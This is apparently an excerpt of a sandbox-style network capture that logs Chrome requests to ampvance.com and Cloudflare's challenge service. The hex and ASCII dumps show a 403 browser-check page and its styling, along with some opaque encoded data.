                                                      2024-03-05 13:24:35 UTC1369INData Raw: 79 63 70 4b 5a 2b 75 72 2b 61 6e 59 4f 68 73 5a 79 79 77 36 2f 43 72 4a 69 59 6c 72 43 2b 6b 64 44 4c 73 37 54 51 7a 62 2f 64 75 62 61 7a 32 62 65 36 75 63 66 44 76 72 72 78 30 4d 44 4f 79 38 62 75 37 65 50 30 39 4c 32 31 33 41 44 66 42 65 30 43 32 4e 2f 42 2f 74 76 69 42 50 6e 6a 2b 41 4c 66 36 51 62 68 79 38 2f 50 45 76 6a 6d 46 39 4d 47 32 50 51 61 44 52 59 6a 2f 67 66 65 45 79 4d 4a 47 42 6e 69 36 75 34 77 44 79 55 55 49 2f 4d 70 38 69 41 43 4a 7a 45 59 2f 44 44 36 4d 42 49 32 4f 6a 77 53 4f 68 49 36 46 43 4d 57 54 53 49 6d 42 55 56 48 48 56 4a 51 4d 53 38 79 56 30 4e 4d 4e 42 55 58 55 43 77 78 59 6c 52 65 46 68 63 33 52 47 41 6e 4f 69 4e 57 4a 6d 34 73 51 6a 78 52 53 7a 4e 78 63 7a 52 78 54 45 70 58 54 7a 31 59 65 6a 49 7a 56 58 67 36 62 6e 46 59 65
                                                      Data Ascii: ycpKZ+ur+anYOhsZyyw6/CrJiYlrC+kdDLs7TQzb/dubaz2be6ucfDvrrx0MDOy8bu7eP09L213ADfBe0C2N/B/tviBPnj+ALf6Qbhy8/PEvjmF9MG2PQaDRYj/gfeEyMJGBni6u4wDyUUI/Mp8iACJzEY/DD6MBI2OjwSOhI6FCMWTSImBUVHHVJQMS8yV0NMNBUXUCwxYlReFhc3RGAnOiNWJm4sQjxRSzNxczRxTEpXTz1YejIzVXg6bnFYe
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 61 75 6f 75 4f 77 38 66 44 7a 4d 75 32 74 4a 69 53 32 70 71 74 31 72 58 51 6e 72 33 67 30 4b 43 6a 36 4e 4c 43 79 2b 47 32 74 39 6d 38 37 74 7a 49 30 72 53 2b 73 2f 48 6e 37 4f 72 38 36 2f 4c 52 31 76 50 2b 2f 4f 58 43 33 63 2f 33 34 4d 66 48 41 63 33 58 78 63 6a 4f 44 64 37 31 35 4f 76 69 2b 52 48 72 31 41 77 52 42 77 67 58 47 68 6b 59 47 53 49 50 43 52 4c 6f 48 2f 62 36 36 69 2f 2b 2b 51 55 4f 42 54 49 50 4b 77 6b 73 4c 67 73 50 48 51 38 72 39 79 6f 57 47 53 30 42 44 78 34 5a 4e 6b 6b 33 53 69 34 41 46 79 73 50 4d 54 41 51 51 6b 41 51 49 55 52 47 55 44 6c 5a 57 57 41 7a 51 43 6f 39 55 46 35 42 54 7a 5a 53 61 57 5a 5a 52 79 64 45 58 54 39 53 4b 6d 5a 47 51 31 64 59 54 6b 55 78 53 48 5a 4c 56 47 6c 32 4f 48 64 2f 51 6e 68 79 52 6f 5a 58 52 47 43 4e 52 6b
                                                      Data Ascii: auouOw8fDzMu2tJiS2pqt1rXQnr3g0KCj6NLCy+G2t9m87tzI0rS+s/Hn7Or86/LR1vP+/OXC3c/34MfHAc3XxcjODd715Ovi+RHr1AwRBwgXGhkYGSIPCRLoH/b66i/++QUOBTIPKwksLgsPHQ8r9yoWGS0BDx4ZNkk3Si4AFysPMTAQQkAQIURGUDlZWWAzQCo9UF5BTzZSaWZZRydEXT9SKmZGQ1dYTkUxSHZLVGl2OHd/QnhyRoZXRGCNRk
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 77 49 32 70 32 4b 2f 4a 6d 4a 69 64 31 4d 43 32 6f 62 37 68 6f 75 4b 31 71 4b 69 39 36 61 65 74 72 74 7a 6f 72 4e 37 73 38 36 33 67 7a 74 6e 4e 75 74 62 6d 2b 38 6e 61 33 51 48 56 76 63 37 43 33 4e 65 2f 77 77 63 42 34 77 76 35 36 63 49 52 36 51 44 53 7a 67 48 32 38 4f 38 58 44 66 63 65 36 52 54 66 33 42 34 68 41 4f 4c 38 39 67 4c 6a 46 69 48 36 41 67 59 70 4b 54 45 6b 44 2b 76 73 49 52 50 31 45 42 41 58 44 78 49 4b 4f 54 6b 42 4c 76 6e 2b 2f 54 45 78 45 67 49 33 49 79 70 4e 4a 51 5a 48 44 55 34 7a 44 56 4d 72 4d 68 6c 5a 56 6a 63 6f 46 55 73 72 55 32 46 4d 59 69 45 66 59 6b 4e 5a 51 46 64 68 52 47 35 61 59 56 6b 73 52 6e 56 30 4c 6b 31 4c 57 6e 59 37 56 32 68 2b 61 57 6c 61 4f 6e 35 35 64 49 4e 53 65 58 56 66 58 6f 5a 48 53 45 2b 46 63 6b 74 53 62 35 53
                                                      Data Ascii: wI2p2K/JmJid1MC2ob7houK1qKi96aetrtzorN7s863gztnNutbm+8na3QHVvc7C3Ne/wwcB4wv56cIR6QDSzgH28O8XDfce6RTf3B4hAOL89gLjFiH6AgYpKTEkD+vsIRP1EBAXDxIKOTkBLvn+/TExEgI3IypNJQZHDU4zDVMrMhlZVjcoFUsrU2FMYiEfYkNZQFdhRG5aYVksRnV0Lk1LWnY7V2h+aWlaOn55dINSeXVfXoZHSE+FcktSb5S
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 63 62 53 7a 72 6e 4f 31 72 6e 44 30 65 62 55 30 61 54 6d 32 65 4f 6d 72 71 58 6a 77 72 4c 77 36 4b 2f 69 38 50 43 30 35 75 7a 70 75 4e 6a 30 2f 4c 37 39 76 51 58 41 33 50 51 44 78 75 54 34 43 67 44 64 37 65 45 49 36 65 38 45 46 42 67 46 39 68 72 5a 47 52 72 72 33 52 6f 51 33 66 6b 56 4a 76 62 77 2f 68 55 6e 47 77 63 47 4c 79 76 71 49 54 50 6f 4b 52 4d 79 39 67 63 74 39 79 6f 39 4a 54 2f 30 47 76 37 39 46 78 77 78 52 76 6a 39 53 41 6f 67 42 6a 77 47 55 43 63 67 43 77 31 55 49 6a 59 6f 4c 6a 4a 52 4c 43 6c 49 54 78 64 66 56 46 73 31 59 45 39 68 54 31 42 49 53 43 4e 72 4c 56 39 4f 62 79 74 6b 58 45 35 76 59 30 6c 43 63 58 55 34 53 6a 68 76 54 44 78 41 65 47 4e 68 52 48 64 76 56 6e 4f 44 53 58 79 4d 67 30 32 4b 68 45 74 75 58 6f 57 4f 61 59 79 59 67 6f 4f 51
                                                      Data Ascii: cbSzrnO1rnD0ebU0aTm2eOmrqXjwrLw6K/i8PC05uzpuNj0/L79vQXA3PQDxuT4CgDd7eEI6e8EFBgF9hrZGRrr3RoQ3fkVJvbw/hUnGwcGLyvqITPoKRMy9gct9yo9JT/0Gv79FxwxRvj9SAogBjwGUCcgCw1UIjYoLjJRLClITxdfVFs1YE9hT1BISCNrLV9ObytkXE5vY0lCcXU4SjhvTDxAeGNhRHdvVnODSXyMg02KhEtuXoWOaYyYgoOQ
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 4f 64 75 74 2f 6e 6f 63 66 6a 79 75 4b 2f 78 4d 54 65 36 4e 72 64 73 36 7a 42 36 50 66 51 39 62 50 6b 39 62 58 33 75 66 33 58 42 66 6b 45 38 50 44 33 30 38 50 69 39 74 7a 2b 44 75 2f 44 36 63 30 55 30 74 45 49 30 77 34 44 32 50 66 36 46 68 49 61 49 69 4c 69 46 66 77 45 47 2f 50 6f 48 50 6f 71 35 79 6b 52 48 69 55 6e 4b 79 67 4c 41 43 6f 30 42 79 55 4f 39 68 49 57 45 79 35 41 41 30 49 6d 41 6a 4d 34 53 44 70 45 4f 42 5a 47 49 55 59 44 50 79 73 66 51 69 42 56 47 43 64 43 4f 6a 31 51 56 43 73 37 50 45 49 34 57 6b 4d 35 5a 6b 45 2f 49 43 73 6e 52 7a 67 6f 5a 32 64 64 4b 31 39 66 56 6b 56 70 56 56 5a 70 57 7a 4e 76 57 56 59 33 56 56 42 42 63 47 52 42 57 32 65 46 53 59 70 44 68 56 31 6c 67 57 78 50 62 47 6c 73 63 57 69 4a 55 57 4f 4b 56 6e 46 65 67 46 35 33 67
                                                      Data Ascii: Odut/nocfjyuK/xMTe6Nrds6zB6PfQ9bPk9bX3uf3XBfkE8PD308Pi9tz+Du/D6c0U0tEI0w4D2Pf6FhIaIiLiFfwEG/PoHPoq5ykRHiUnKygLACo0ByUO9hIWEy5AA0ImAjM4SDpEOBZGIUYDPysfQiBVGCdCOj1QVCs7PEI4WkM5ZkE/ICsnRzgoZ2ddK19fVkVpVVZpWzNvWVY3VVBBcGRBW2eFSYpDhV1lgWxPbGlscWiJUWOKVnFegF53g


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.549723104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:35 UTC852OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:35 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:24:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16247
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: KyFsquqtSWNs82QDNU8rM3cbTNjgWuW/6qSb3S0n3K5PS/gBJVdukcGz8ASrjO5D6xN4N3+zSGAmdA58Wx5u6zc2NvgCOSwJahq/F2frE7dEfmhPk6VMdvgG5TNcpXfxzKCpA4+vxbf8RAciafaHxw==$a1proFIkeyWGamPC2b+3NA==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:24:35 UTC403INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4d 67 76 48 6b 43 4f 30 67 36 47 34 62 34 6f 5a 71 68 67 34 6d 77 64 25 32 46 46 68 48 53 6a 73 25 32 42 6d 58 50 51 6e 62 4f 4a 77 78 6c 34 66 42 56 36 73 71 52 6f 36 4a 59 78 57 42 76 76 6a 76 55 70 46 31 61 4d 48 70 25 32 46 7a 30 36 61 39 43 6d 62 4b 75 42 63 55 62 4a 64 4e 49 37 67 4e 4a 44 58 4c 55 4c 6b 44 47 6c 6c 45 64 53 76 68 71 36 38 31 75 6c 70 6f 71 51 42 6b 34 62 54 4d 4b 58 46 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MgvHkCO0g6G4b4oZqhg4mwd%2FFhHSjs%2BmXPQnbOJwxl4fBV6sqRo6JYxWBvvjvUpF1aMHp%2Fz06a9CmbKuBcUbJdNI7gNJDXLULkDGllEdSvhq681ulpoqQBk4bTMKXF4%3D"}],"group":"cf-nel","max_age":604800}N
                                                      2024-03-05 13:24:35 UTC1045INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54
                                                      Data Ascii: zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMT
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 62 6f 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30
                                                      Data Ascii: body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67
                                                      Data Ascii: ng div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:imag
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74
                                                      Data Ascii: -decoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-t
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b
                                                      Data Ascii: tLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{back
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d
                                                      Data Ascii: idth:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74
                                                      Data Ascii: a http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to cont
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 55 41 57 47 67 73 6f 42 73 41 62 43 4a 39 6c 78 75 42 41 6f 73 73 59 69 41 77 46 42 38 61 62 4b 5a 63 37 61 51 64 78 4b 4f 52 69 49 6b 48 78 4f 7a 64 79 4e 70 6f 53 2e 51 32 39 75 55 6c 6c 43 53 6e 68 6b 59 44 41 41 2e 4d 4e 30 5f 35 38 58 74 65 55 56 6e 78 53 59 77 68 70 56 41 62 32 47 44 67 37 6d 33 74 6b 53 2e 54 6a 56 34 79 32 32 6e 57 5a 34 6b 41 4d 51 5f 69 4b 6b 49 62 34 56 6d 32 61 5a 2e 64 33 50 74 52 36 2e 74 43 6f 6c 5f 72 65 41 31 54 70 54 78 54 6d 68 42 70 4c 36 6f 78 2e 53 71 78 53 46 6a 63 65 59 51 43 63 61 4b 58 62 39 4e 55 79 34 47 76 49 73 6f 6f 74 53 63 38 33 6b 57 65 6f 7a 4e 47 56 77 43 77 74 4b 50 38 6d 5f 43 62 68 67 4d 34 38 4a 6d 36 6e 57 51 4e 38 30 76 71 73 6e 35 41 32 61 6e 51 64 48 32 53 62 6f 44 58 78 39 32 39 75 64 52 6d 57
                                                      Data Ascii: UAWGgsoBsAbCJ9lxuBAossYiAwFB8abKZc7aQdxKORiIkHxOzdyNpoS.Q29uUllCSnhkYDAA.MN0_58XteUVnxSYwhpVAb2GDg7m3tkS.TjV4y22nWZ4kAMQ_iKkIb4Vm2aZ.d3PtR6.tCol_reA1TpTxTmhBpL6ox.SqxSFjceYQCcaKXb9NUy4GvIsootSc83kWeozNGVwCwtKP8m_CbhgM48Jm6nWQN80vqsn5A2anQdH2SboDXx929udRmW


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.549724104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:36 UTC754OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: iframe
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:36 UTC1187INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:36 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                      cross-origin-embedder-policy: require-corp
                                                      cross-origin-opener-policy: same-origin
                                                      cross-origin-resource-policy: cross-origin
                                                      document-policy: js-profiling
                                                      origin-agent-cluster: ?1
